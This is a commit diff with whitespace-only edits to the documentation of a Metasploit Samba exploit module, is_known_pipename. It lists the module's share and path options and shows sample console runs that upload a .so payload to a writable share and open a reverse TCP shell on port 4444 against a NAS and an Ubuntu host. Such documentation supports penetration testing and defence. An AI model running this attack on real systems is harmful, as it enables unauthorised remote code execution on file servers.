@@ -58,12 +58,12 @@ echo -ne "type=AVC msg=audit(1495745298.086:334): avc: denied { execstack } fo
58
58
## Options
59
59
60
60
** SMB_SHARE_NAME**
61
-
61
+
62
62
The name of the SMB share containing a writeable directory. Shares are automatically scanned for, and if this
63
63
variable is non-blank, it will be preferred.
64
64
65
65
** SMB_SHARE_BASE**
66
-
66
+
67
67
The remote filesystem path correlating with the SMB share name. This value is preferred, but other values are
68
68
brute forced including:
69
69
@@ -79,7 +79,7 @@ echo -ne "type=AVC msg=audit(1495745298.086:334): avc: denied { execstack } fo
79
79
10 . /tmp/home/home/shared
80
80
81
81
** SMB_FOLDER**
82
-
82
+
83
83
The directory to use within the writeable SMB share. Writable directories are automatically scanned for, and if this
84
84
variable is non-blank, it will be preferred.
85
85
@@ -90,7 +90,7 @@ echo -ne "type=AVC msg=audit(1495745298.086:334): avc: denied { execstack } fo
90
90
```
91
91
msf exploit(is_known_pipename) > exploit
92
92
93
- [*] Started reverse TCP handler on 1.2.3.117:4444
93
+ [*] Started reverse TCP handler on 1.2.3.117:4444
94
94
[*] 1.2.3.119:445 - Using location \\1.2.3.119\ESX\ for the path
95
95
[*] 1.2.3.119:445 - Payload is stored in //1.2.3.119/ESX/ as eePUbtdw.so
96
96
[*] 1.2.3.119:445 - Trying location /volume1/eePUbtdw.so...
@@ -107,9 +107,9 @@ Linux synologyNAS 3.10.102 #15101 SMP Fri May 5 12:01:38 CST 2017 x86_64 GNU/Lin
107
107
### Ubuntu 16.04
108
108
109
109
```
110
- msf exploit(is_known_pipename) > exploit
110
+ msf exploit(is_known_pipename) > exploit
111
111
112
- [*] Started reverse TCP handler on 192.168.0.3:4444
112
+ [*] Started reverse TCP handler on 192.168.0.3:4444
113
113
[*] 192.168.0.3:445 - Using location \\192.168.0.3\yarp\h for the path
114
114
[*] 192.168.0.3:445 - Payload is stored in //192.168.0.3/yarp/h as GTithXJz.so
115
115
[*] 192.168.0.3:445 - Trying location /tmp/yarp/h/GTithXJz.so...
0 commit comments